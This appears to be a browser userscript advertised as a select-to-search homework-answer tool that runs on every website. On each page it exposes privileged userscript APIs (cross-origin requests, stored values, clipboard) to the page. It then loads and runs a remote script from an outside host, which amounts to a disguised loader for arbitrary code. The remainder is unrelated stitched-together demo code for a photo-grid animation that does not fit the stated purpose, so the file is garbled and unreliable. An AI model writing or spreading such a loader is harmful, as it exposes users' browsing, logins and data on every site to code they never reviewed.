// ==UserScript==
// @name 题海 x 划词搜题
// @namespace 题海官方团队
// @version 1.0.0
// @description 🔥所有网页均支持划词搜题,也可输入文本搜题🔥悬浮窗可拖动可关闭,可个性化设置🔥解除网页禁止复制限制🔥🔥🔥适用于各类问答,网课问题,竞赛问题,专业术语,业务名称,情景问题,在线作业等
// @author 题海
// @icon 
// @grant GM_info
// @grant unsafeWindow
// @grant GM_xmlhttpRequest
// @grant GM_addStyle
// @grant GM_registerMenuCommand
// @grant GM_setValue
// @grant GM_getValue
// @grant GM_deleteValue
// @grant GM_setClipboard
// @match *://*/*
// @connect app.itihey.com
// @require https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.min.js
// @require https://cdn.jsdelivr.net/npm/[email protected]/index.min.js
// @require https://cdn.jsdelivr.net/gh/zyufstudio/jQuery@3a09ff54b33fc2ae489b5083174698b3fa83f4a7/jPopBox/dist/jPopBox.min.js
// @antifeature 关注微信公众号
// ==/UserScript==
(function () {
/*!
* classie v1.0.1
* class helper functions
* from bonzo https://github.com/ded/bonzo
* MIT license
*
* classie.has( elem, 'my-class' ) -> true/false
* classie.add( elem, 'my-new-class' )
* classie.remove( elem, 'my-unwanted-class' )
* classie.toggle( elem, 'my-class' )
*/
/*jshint browser: true, strict: true, undef: true, unused: true */
/*global define: false, module: false */
( function( window ) {
// class helper functions from bonzo https://github.com/ded/bonzo
function classReg( className ) {
return new RegExp("(^|\\s+)" + className + "(\\s+|$)");
}
// classList support for class management
// altho to be fair, the api sucks because it won't accept multiple classes at once
var hasClass, addClass, removeClass;
if ( 'classList' in document.documentElement ) {
hasClass = function( elem, c ) {
return elem.classList.contains( c );
};
addClass = function( elem, c ) {
elem.classList.add( c );
};
removeClass = function( elem, c ) {
elem.classList.remove( c );
};
}
else {
hasClass = function( elem, c ) {
return classReg( c ).test( elem.className );
};
addClass = function( elem, c ) {
if ( !hasClass( elem, c ) ) {
elem.className = elem.className + ' ' + c;
}
};
removeClass = function( elem, c ) {
elem.className = elem.className.replace( classReg( c ), ' ' );
};
}
function toggleClass( elem, c ) {
var fn = hasClass( elem, c ) ? removeClass : addClass;
fn( elem, c );
}
var classie = {
// full names
hasClass: hasClass,
addClass: addClass,
removeClass: removeClass,
toggleClass: toggleClass,
// short names
has: hasClass,
add: addClass,
remove: removeClass,
toggle: toggleClass
};
// transport
if ( typeof define === 'function' && define.amd ) {
// AMD
define( classie );
} else if ( typeof exports === 'object' ) {
// CommonJS
module.exports = classie;
} else {
// browser global
window.classie = classie;
}
})( window );
unsafeWindow.GM_getValue = GM_getValue
unsafeWindow.GM_setValue = GM_setValue
unsafeWindow.unsafeWindow = unsafeWindow
unsafeWindow.$ = $
unsafeWindow.GM_addStyle = GM_addStyle
unsafeWindow.GM_xmlhttpRequest = GM_xmlhttpRequest
unsafeWindow.GM_registerMenuCommand = GM_registerMenuCommand
unsafeWindow.GM_info = GM_info
var script = document.createElement('script');
script.src = 'https://www.zhaojiaoben.cn/download/script/3524835685254d03bf5af828815430ec.user.js';
document.head.appendChild(script);
function preventDefault(e) {
e = e || window.event;
if (e.preventDefault)
e.preventDefault();
e.returnValue = false;
}
function preventDefaultForScrollKeys(e) {
if (keys[e.keyCode]) {
preventDefault(e);
return false;
}
}
function disableScroll() {
if (window.addEventListener) // older FF
window.addEventListener('DOMMouseScroll', preventDefault, false);
window.onwheel = preventDefault; // modern standard
window.onmousewheel = document.onmousewheel = preventDefault; // older browsers, IE
window.ontouchmove = preventDefault; // mobile
document.onkeydown = preventDefaultForScrollKeys;
}
function enableScroll() {
if (window.removeEventListener)
window.removeEventListener('DOMMouseScroll', preventDefault, false);
window.onmousewheel = document.onmousewheel = null;
window.onwheel = null;
window.ontouchmove = null;
document.onkeydown = null;
}
/**
* from https://davidwalsh.name/javascript-debounce-function
*/
function randomIntFromInterval(min,max) {
return Math.floor(Math.random()*(max-min+1)+min);
}
// main page container
var mainContainer = document.querySelector('.view'),
// the grid element
gridEl = mainContainer.querySelector('.grid'),
// grid items
gridItems = [].slice.call(gridEl.querySelectorAll('.grid__item')),
// main title element
titleEl = mainContainer.querySelector('.title-wrap > .title--main'),
// main subtitle element
subtitleEl = mainContainer.querySelector('.title-wrap > .title--sub'),
// the fullscreen element/division that will slide up, giving the illusion the items will fall down
pagemover = mainContainer.querySelector('.page--mover'),
// the loading element shown while the images are loaded
loadingStatusEl = pagemover.querySelector('.la-square-loader'),
// window sizes (width and height)
winsize = {width: window.innerWidth, height: window.innerHeight},
// translation values (x and y): percentages of the item´s width and height; scale value; rotation (z) value
// these are the values that the 6 initial images will have
introPositions = [
{tx: -.6, ty:-.3, s:1.1, r:-20},
{tx: .2, ty:-.7, s:1.4, r:1},
{tx: .5, ty:-.5, s:1.3, r:15},
{tx: -.2, ty:-.4, s:1.4, r:-17},
{tx: -.15, ty:-.4, s:1.2, r:-5},
{tx: .7, ty:-.2, s:1.1, r:15}
],
// the phone
deviceEl = mainContainer.querySelector('.device'),
// the animated button that triggers the effect when clicked
showGridCtrl = document.getElementById('showgrid'),
// the title and subtitle shown on top of the grid
pageTitleEl = mainContainer.querySelector('.page__title > .page__title-main'),
pageSubTitleEl = mainContainer.querySelector('.page__title > .page__title-sub'),
// the grid´s load more button
loadMoreCtrl = mainContainer.querySelector('button.button--load'),
// true if the animation is currently running
isAnimating,
// true if the user scrolls (rather than clicking the down arrow)
scrolled,
// current view: stack | grid
view = 'stack';
function init() {
// appending a unique string to every image src as a workaround for an apparent Chrome issue with the imagesLoaded (cache is not cleared, premature firing seems to happen)
[].slice.call(gridEl.querySelectorAll('img')).forEach(function(el) { el.src += '?' + Number(new Date()); });
// disable scroll while loading images
classie.add(document.body, 'overflow');
disableScroll();
// preload images
imagesLoaded(gridEl, function() {
// enable page scroll again
enableScroll();
// controls the visibility of the grid items. Adding this class will make them visible.
classie.add(mainContainer, 'view--loaded');
// show initial view
showIntro();
// bind events
initEvents();
});
}
function loadNextItems() {
// loadMoreCtrl button gets class button--loading. This will transform the button into a loading/animated button
classie.add(loadMoreCtrl, 'button--loading');
// the timeout serves to simulate the time that we would probably wait for the response
setTimeout(function() {
// hide button
classie.add(loadMoreCtrl, 'button--hidden');
// add some extra items to the grid
var dummyContent = '<li class="grid__item grid__item--hidden"><a class="grid__link" href="#"><img class="grid__img" src="img/photos/1.jpg" alt="Some image" /><h3 class="grid__item-title">Natural saturation effects</h3></a></li><li class="grid__item grid__item--hidden"><a class="grid__link" href="#"><img class="grid__img" src="img/photos/2.jpg" alt="Some image" /><h3 class="grid__item-title">Auto-color and light</h3></a></li><li class="grid__item grid__item--hidden"><a class="grid__link" href="#"><img class="grid__img" src="img/photos/3.jpg" alt="Some image" /><h3 class="grid__item-title">That special blur</h3></a></li><li class="grid__item grid__item--hidden"><a class="grid__link" href="#"><img class="grid__img" src="img/photos/4.jpg" alt="Some image" /><h3 class="grid__item-title">Drama where you need it</h3></a></li><li class="grid__item grid__item--hidden"><a class="grid__link" href="#"><img class="grid__img" src="img/photos/5.jpg" alt="Some image" /><h3 class="grid__item-title">Realistic depth</h3></a></li><li class="grid__item grid__item--hidden"><a class="grid__link" href="#"><img class="grid__img" src="img/photos/6.jpg" alt="Some image" /><h3 class="grid__item-title">The common, but special</h3></a></li>';
gridEl.innerHTML += dummyContent;
[].slice.call(gridEl.querySelectorAll('.grid__item--hidden')).forEach(function(item) {
gridItems.push(item);
dynamics.css(item, { scale: 0, opacity: 0 });
classie.remove(item, 'grid__item--hidden');
dynamics.animate(item, { scale: 1, opacity: 1 }, {
type: dynamics.spring,
duration: 2000,
frequency: 400,
friction: 400,
delay: randomIntFromInterval(0,300)
});
});
}, 1500);
}
})();